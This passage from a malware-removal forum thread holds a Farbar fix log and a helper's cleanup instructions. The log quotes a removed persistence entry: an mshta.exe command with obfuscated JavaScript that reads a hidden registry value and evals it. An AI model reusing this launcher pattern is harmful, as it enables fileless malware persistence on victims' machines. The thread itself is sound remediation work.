Okay, I've spent the last few hours following your directions (the scans took a long time) and everything seems to check out. Norton is not showing any alerts! So from my perspective it appears to have been eradicated, but I have included the Fixlog log file as directed, so hopefully you can tell me if I am incorrect.

 

You instructed me to go ahead and attach the Malwarebytes log files, but I don't see a way to attach files to this thread, so unfortunately they are not included here. I'd be happy to send them to you if I could figure out how or if you could tell me how.

 

Thanks much!

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 30-10-2016
Ran by Harold (31-10-2016 18:04:56) Run:1
Running from C:\Users\Harold\Desktop
Loaded Profiles: Harold & DefaultAppPool (Available Profiles: Harold & Sue & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
SearchScopes: HKLM -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKLM -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKLM -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKLM-x32 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM-x32 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKLM-x32 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> DefaultScope {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {2fa28606-de77-4029-af96-b231e3b8f827} URL = hxxp://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {d944bb61-2e34-4dbf-a683-47e505c587dc} URL = hxxp://rover.ebay.com/rover/1/711-111092-2357-0/4?satitle={searchTerms}&mfe=Desktops
SearchScopes: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001 -> {ec29edf6-ad3c-4e1c-a087-d6cb81400c43} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360\Engine\21.7.0.11\IPS\IPSBHO.DLL => No File
BHO-x32: iSkysoft iMedia Converter Deluxe 5.1.0 -> {AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE} -> C:\PROGRA~3\iSkysoft\VIDEOC~1\WSBROW~1.DLL => No File
Handler: WSISVCUchrome - {78A543EB-3A61-4ED3 -  No File
FF user.js: detected! => C:\Users\Harold\AppData\Roaming\Mozilla\Firefox\Profiles\be2mjg6m.default\user.js [2016-03-26]
FF Plugin HKU\S-1-5-21-1355648730-1136835254-2900194302-1001: @hulu.com/Hulu Desktop -> C:\Users\Default.migrated\AppData\Local\HuluDesktop\instances\0.9.13.1\nphdplg.dll [No File]
U3 idsvc; no ImagePath
Task: {182548B4-34C3-493B-9E25-80E7BECB6AEE} - System32\Tasks\{80D68447-CC1E-4AC0-8C98-D29AFA292270} => pcalua.exe -a C:\Users\Harold\Downloads\NOF-Essentials.exe -d "C:\Program Files (x86)\Mozilla Firefox"
Task: {24CF2868-3518-4830-ADEB-81A5230BD173} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {2917EE86-583E-4CED-848E-79DC2A6287E0} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {426D89B7-22E3-4132-B434-C26049460A35} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {503702D7-8726-42F3-A652-BB92440B76A9} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {74960916-8CB4-4A24-9C21-266DBF7C1613} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {825A3C24-77CF-4714-9606-2BE4B48D1F62} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {B1D2A3C3-2F0F-4AB8-B994-7D02F28EBA91} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {C36A6DB5-4989-40D8-885A-EB418B1C97FD} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {C6543766-4A8C-472F-8B19-CAFBF8CB18B7} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {CD289DED-2CCC-46B1-B7A6-D863153BD078} - System32\Tasks\{126C6E32-44AE-45CB-BF8C-B9605C8636F6} => pcalua.exe -a L:\Setup.exe -d L:\
Task: {CFC27006-0508-4E5A-B01F-AE139D853F8C} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
Task: {D82A5397-CB31-4135-8EE6-A6301B2406D1} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION
Task: {F2ADC65E-7099-42E2-B116-6BE9B5C5EED2} - System32\Tasks\{F5731F9E-4BFC-4B09-987E-D3B8F9F5F80A} => pcalua.exe -a C:\Windows\system32\pcwrun.exe -c "C:\Program Files (x86)\NetObjects\NetObjects Fusion Essentials\Fusion.exe"
Task: {F6DBD05A-D8A1-4E06-B4AB-9F4B41D83D65} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`26hfm [0]
IE trusted site: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\driversupport.com -> hxxp://apps.driversupport.com
IE trusted site: HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\driversupport.com -> hxxps://apps.driversupport.com
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\...\Run: [**lbpxghqil<*>] => "C:\Users\Harold\AppData\Local\0d9f76\909634.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Classes\9556ee: "C:\WINDOWS\system32\mshta.exe" "javascript:A8gDIF="gQr";A6C=new ActiveXObject("WScript.Shell");Zq58tMz="n";U0FdG=A6C.RegRead("HKCU\\software\\sdca\\hzqzf");Vo7QZ3="pCt64";eval(U0FdG);PlZSb8ur="l3m7Wyvw";" <===== ATTENTION
DeleteKey: HKCU\\software\\sdca
Startup: C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ae5a3b.lnk [2016-10-30]
Startup: C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d433f5.lnk [2016-10-08]
Shortcut: C:\Users\Harold\AppData\Local\0d9f76\909634.lnk -> C:\Users\Harold\AppData\Local\0d9f76\2eb755.bat ()
2016-10-08 09:38 - 2016-10-16 17:32 - 00000000 ____D C:\Users\Harold\AppData\Local\0d9f76
2016-10-08 09:38 - 2016-10-08 09:38 - 00000000 ____D C:\Users\Harold\AppData\Roaming\dc130f
C:\Users\Harold\jagex_runescape_preferences.dat
C:\Users\Harold\jagex_runescape_preferences2.dat
C:\Windows\SysWOW64\000*.tmp
C:\Program Files\Internet Explorer\000*.tmp
C:\Program Files (x86)\Internet Explorer\000*.tmp
cmd: ipconfig /flushdns
cmd: netsh advfirewall reset
cmd: netsh advfirewall set allprofiles state on
Reg: Reg Delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F
Reg: Reg Add "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
CMD: bitsadmin /reset /allusers
RemoveProxy:
EmptyTemp:
Reboot:
end
*****************

Restore point was successfully created.
Processes closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value removed successfully
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\QuickTime Task => value not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => key removed successfully
HKCR\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => key removed successfully
HKCR\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{d43b3890-80c7-4010-a95d-1e77b5924dc3}" => key removed successfully
HKCR\CLSID\{d43b3890-80c7-4010-a95d-1e77b5924dc3} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{d944bb61-2e34-4dbf-a683-47e505c587dc}" => key removed successfully
HKCR\CLSID\{d944bb61-2e34-4dbf-a683-47e505c587dc} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43}" => key removed successfully
HKCR\CLSID\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => key removed successfully
HKCR\Wow6432Node\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => key removed successfully
HKCR\Wow6432Node\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{d43b3890-80c7-4010-a95d-1e77b5924dc3}" => key removed successfully
HKCR\Wow6432Node\CLSID\{d43b3890-80c7-4010-a95d-1e77b5924dc3} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{d944bb61-2e34-4dbf-a683-47e505c587dc}" => key removed successfully
HKCR\Wow6432Node\CLSID\{d944bb61-2e34-4dbf-a683-47e505c587dc} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43}" => key removed successfully
HKCR\Wow6432Node\CLSID\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43} => key not found.
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2fa28606-de77-4029-af96-b231e3b8f827}" => key removed successfully
HKCR\CLSID\{2fa28606-de77-4029-af96-b231e3b8f827} => key not found.
"HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{b7fca997-d0fb-4fe0-8afd-255e89cf9671}" => key removed successfully
HKCR\CLSID\{b7fca997-d0fb-4fe0-8afd-255e89cf9671} => key not found.
"HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{d43b3890-80c7-4010-a95d-1e77b5924dc3}" => key removed successfully
HKCR\CLSID\{d43b3890-80c7-4010-a95d-1e77b5924dc3} => key not found.
"HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{d944bb61-2e34-4dbf-a683-47e505c587dc}" => key removed successfully
HKCR\CLSID\{d944bb61-2e34-4dbf-a683-47e505c587dc} => key not found.
"HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43}" => key removed successfully
HKCR\CLSID\{ec29edf6-ad3c-4e1c-a087-d6cb81400c43} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6D53EC84-6AAE-4787-AEEE-F4628F01010C}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{6D53EC84-6AAE-4787-AEEE-F4628F01010C}" => key removed successfully
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE}" => key removed successfully
"HKCR\Wow6432Node\CLSID\{AEAF002F-E6D8-4A21-ABD3-2B309B79A6CE}" => key removed successfully
"HKCR\PROTOCOLS\Handler\WSISVCUchrome" => key removed successfully
C:\Users\Harold\AppData\Roaming\Mozilla\Firefox\Profiles\be2mjg6m.default\user.js => moved successfully
C:\Users\Harold\AppData\Roaming\Mozilla\Firefox\Profiles\be2mjg6m.default\user.js => not found.
"HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\MozillaPlugins\@hulu.com/Hulu Desktop" => key removed successfully
C:\Users\Default.migrated\AppData\Local\HuluDesktop\instances\0.9.13.1\nphdplg.dll => not found.
idsvc => service removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{182548B4-34C3-493B-9E25-80E7BECB6AEE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{182548B4-34C3-493B-9E25-80E7BECB6AEE}" => key removed successfully
C:\WINDOWS\System32\Tasks\{80D68447-CC1E-4AC0-8C98-D29AFA292270} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{80D68447-CC1E-4AC0-8C98-D29AFA292270}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{24CF2868-3518-4830-ADEB-81A5230BD173}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{24CF2868-3518-4830-ADEB-81A5230BD173}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2917EE86-583E-4CED-848E-79DC2A6287E0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2917EE86-583E-4CED-848E-79DC2A6287E0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{426D89B7-22E3-4132-B434-C26049460A35}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{426D89B7-22E3-4132-B434-C26049460A35}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{503702D7-8726-42F3-A652-BB92440B76A9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{503702D7-8726-42F3-A652-BB92440B76A9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{74960916-8CB4-4A24-9C21-266DBF7C1613}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{74960916-8CB4-4A24-9C21-266DBF7C1613}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{825A3C24-77CF-4714-9606-2BE4B48D1F62}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{825A3C24-77CF-4714-9606-2BE4B48D1F62}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{B1D2A3C3-2F0F-4AB8-B994-7D02F28EBA91}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{B1D2A3C3-2F0F-4AB8-B994-7D02F28EBA91}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C36A6DB5-4989-40D8-885A-EB418B1C97FD}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C36A6DB5-4989-40D8-885A-EB418B1C97FD}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6543766-4A8C-472F-8B19-CAFBF8CB18B7}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6543766-4A8C-472F-8B19-CAFBF8CB18B7}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CD289DED-2CCC-46B1-B7A6-D863153BD078}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CD289DED-2CCC-46B1-B7A6-D863153BD078}" => key removed successfully
C:\WINDOWS\System32\Tasks\{126C6E32-44AE-45CB-BF8C-B9605C8636F6} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{126C6E32-44AE-45CB-BF8C-B9605C8636F6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CFC27006-0508-4E5A-B01F-AE139D853F8C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFC27006-0508-4E5A-B01F-AE139D853F8C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\OfficeSoftwareProtectionPlatform\SvcRestartTask" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D82A5397-CB31-4135-8EE6-A6301B2406D1}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D82A5397-CB31-4135-8EE6-A6301B2406D1}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F2ADC65E-7099-42E2-B116-6BE9B5C5EED2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F2ADC65E-7099-42E2-B116-6BE9B5C5EED2}" => key removed successfully
C:\WINDOWS\System32\Tasks\{F5731F9E-4BFC-4B09-987E-D3B8F9F5F80A} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F5731F9E-4BFC-4B09-987E-D3B8F9F5F80A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{F6DBD05A-D8A1-4E06-B4AB-9F4B41D83D65}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F6DBD05A-D8A1-4E06-B4AB-9F4B41D83D65}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully
C:\ProgramData\Reprise => ":wupeogjxldtlfudivq`qsp`26hfm" ADS removed successfully.
"HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\driversupport.com" => key removed successfully
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\driversupport.com => key not found.
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Microsoft\Windows\CurrentVersion\Run\\**lbpxghqil<*> => value removed successfully
"HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\Software\Classes\9556ee" => key removed successfully
HKCU\\software\\sdca => key removed successfully
C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ae5a3b.lnk => moved successfully
C:\Users\Harold\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d433f5.lnk => moved successfully
C:\Users\Harold\AppData\Local\0d9f76\909634.lnk => moved successfully
C:\Users\Harold\AppData\Local\0d9f76 => moved successfully
C:\Users\Harold\AppData\Roaming\dc130f => moved successfully
C:\Users\Harold\jagex_runescape_preferences.dat => moved successfully
C:\Users\Harold\jagex_runescape_preferences2.dat => moved successfully

=========== "C:\Windows\SysWOW64\000*.tmp" ==========

not found

========= End -> "C:\Windows\SysWOW64\000*.tmp" ========


=========== "C:\Program Files\Internet Explorer\000*.tmp" ==========

not found

========= End -> "C:\Program Files\Internet Explorer\000*.tmp" ========


=========== "C:\Program Files (x86)\Internet Explorer\000*.tmp" ==========

not found

========= End -> "C:\Program Files (x86)\Internet Explorer\000*.tmp" ========


========= ipconfig /flushdns =========


Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========


========= netsh advfirewall reset =========

Ok.


========= End of CMD: =========


========= netsh advfirewall set allprofiles state on =========

Ok.


========= End of CMD: =========


========= Reg Delete "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F =========

ERROR: The system was unable to find the specified registry key or value.


========= End of Reg: =========


========= Reg Add "HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg" /F =========

The operation completed successfully.



========= End of Reg: =========


========= reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.



========= End of Reg: =========


========= reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f =========

The operation completed successfully.



========= End of Reg: =========


========= bitsadmin /reset /allusers =========


BITSADMIN version 3.0
BITS administration utility.
© Copyright 2000-2006 Microsoft Corp.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.
Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

0 out of 0 jobs canceled.

========= End of CMD: =========


========= RemoveProxy: =========

HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => value removed successfully
HKU\S-1-5-21-1355648730-1136835254-2900194302-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => value removed successfully


========= End of RemoveProxy: =========


=========== EmptyTemp: ==========

BITS transfer queue => 1368425 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 237055010 B
Java, Flash, Steam htmlcache => 163871 B
Windows/system/drivers => 1175424 B
Edge => 2485975 B
Chrome => 0 B
Firefox => 461679635 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 22822 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 110804 B
NetworkService => 1796 B
Harold => 34893846 B
Sue => 349198 B
DefaultAppPool => 22822 B

RecycleBin => 176317497189 B
EmptyTemp: => 164.9 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 18:17:29 ====



#8 dbrisendine

Posted 31 October 2016 - 11:23 PM

If you are replying by using the editor box below the thread's last post, click on the More Reply Options button. This will load the full editor, which has the Attach Files function at the bottom of the editor window. Click on Browse... and select the file you want to attach to your post by using the File Explorer window that opens. Once the file is selected and you see the file name next to the Browse... button, click Attach This File to attach the file to the post.


Please do not ask for Malware help via PM (Private Messages).  Please post in the forum boards instead.  Thanks.

My help is always free but if you would like to help encourage me or show your thanks -----> btn_donate_LG.gif


#9 brokus4

Posted 01 November 2016 - 06:04 AM

Got it! Mbar log files attached!

 

Thank you again!

 

Also, I will be traveling for the next 2 days, so I will be unable to respond to any other items that need attention until Thursday.



#10 dbrisendine

Posted 01 November 2016 - 10:34 AM

Have a safe trip and don't worry; things look very good so far (on your system, that is).  When you get back, please run the following two checkup scans and post (or attach) those logs:
 
FIRST>>>>

AdwCleaner by Xplode

Download AdwCleaner from here or from here. Save the file to the desktop.


NOTE: If you are using IE 8 or above you may get a warning that stops the program from downloading. Just click on the warning and allow the download to complete.

Close all open windows and browsers.

  • Vista/7/8 users: Right click the AdwCleaner icon on the desktop, click Run as administrator and accept the UAC prompt to run AdwCleaner.
    You will see the following console:

    [Screenshot of the AdwCleaner console]
  • Click the Scan button and wait for the scan to finish.
  • After the Scan has finished the window may or may not show what it found and above, in the progress bar, you will see: Pending. Please uncheck elements you don't want to remove.
  • Click the Clean button.
  • Everything checked will be deleted.
  • When the program has finished cleaning a report appears.
  • Once done it will ask to reboot; allow this.
  • On reboot a log will be produced; please copy / paste that in your next reply. This report is also saved to C:\AdwCleaner\AdwCleaner[S0].txt

Optional:

NOTE: If you see AVG Secure Search being targeted for deletion, Here's Why and Here. You can always Reinstall it.




SECOND>>>>

Malwarebytes' Anti-Malware
